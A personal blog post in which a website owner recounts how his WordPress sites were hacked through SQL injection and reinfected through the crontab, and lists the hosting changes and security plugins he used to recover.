In February 2013, my WordPress-based website www.nickezzo.com was compromised (hacked) by an overseas-based person or group. The hacker exploited a known weakness in WordPress to execute a SQL injection and take control of the server and several of my websites. I found strange files hidden within the WordPress directories that had names that were remarkably similar to WordPress filenames. I found weird entries in the database that pointed to other sites across the Internet, mostly in Russia.
Soon, people were emailing and Tweeting me that my site was out of control and spamming people with a fake PayPal email. Some people were really pissed off, and I can’t say I blame them. Having your website compromised is one of the worst things that can happen to an online marketer. It’s like having your car stolen, then having that stolen car used to commit unspeakable crimes.
Over the course of several weeks, I repeatedly cleaned the site of all traces of malware. Each time I thought I had finished, somehow all the offending files, database entries, and other bits of code reappeared within a few days. I must have cleaned the site top to bottom five times within in a three-week period. Eventually, I realized that the hacker had infected the crontab, instructing the server to re-spread the malware across my websites.
Here’s how I eventually fixed the problem:
- Moved the site off the dedicated Linux server to shared hosting providers. For this I used GoDaddy and SiteGround (for different sites). Both of these providers can help prevent and remove malware from infected sites.
- Re-posted every entry by hand to make sure no code was inadvertently copied to the new provider.
- Installed two WordPress plug-ins to scan and secure the sites:
- Sucuri SiteCheck Malware Scanner: Deep malware scanning, 1-click hardening, last logins, WordPress integrity check.
- BulletProof Security (BPS): Locks down .htaccess and other key files, provides a detailed security log.
- Signed up with Incapsula to create an extra barrier between the hackers and my website. In the last 30 days, the Incapsula service has blocked 38 “Bad Bots” from reaching my site.
Hopefully, anyone reading this will take more care than I did to prevent this from happening to them. Trust me when I say that having your website spam people is a great way to make people hate you. Good luck and stay safe!